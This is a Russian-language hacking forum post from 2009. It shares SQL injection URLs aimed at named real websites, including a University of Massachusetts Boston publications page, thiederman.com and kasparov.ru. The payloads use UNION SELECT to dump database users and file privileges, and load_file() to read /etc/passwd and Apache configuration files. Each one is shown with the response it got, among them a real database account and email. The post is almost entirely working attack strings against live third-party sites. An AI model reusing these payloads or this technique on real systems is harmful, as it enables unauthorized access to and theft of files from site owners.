28.07.2009, 18:21
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
jokester:
Код:
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,user()+from+mysql.user/*
Ответ: tltltl@info.umb.edu
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user/*
Ответ: N
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,load_file('/etc/passwd')/*
Ответ: содержимое /etc/passwd
---------------------------------------------------------------------------------------
Или еще может быть такая ситуация:
http://www.thiederman.com/products_detail.php?id=-10+union+select+1,file_priv,3,4,5,6+from+mysql.user--
Ответ: Couldn't execute query
Но запрос:
http://www.thiederman.com/products_detail.php?id=-10+union+select+1,load_file('/etc/passwd'),3,4,5,6--
- положительный
Ну хз, может я чего не понимаю
По поводу пункта 1 пример:
Код:
http://www.kasparov.ru/subject.php?id=-74'+union+select+user()+from+mysql.user/*
Ответ: editor@192.168.1.70
http://www.kasparov.ru/subject.php?id=-74'+union+select+file_priv+from+mysql.user+where+user()='editor@192.168.1.70'/*
Ответ: Y
http://www.kasparov.ru/subject.php?id=-74'+union+select+load_file('/etc/httpd/conf/httpd.conf')/*
Ответ: содержимое /etc/httpd/conf/httpd.conf (в сорцах)
|
|
|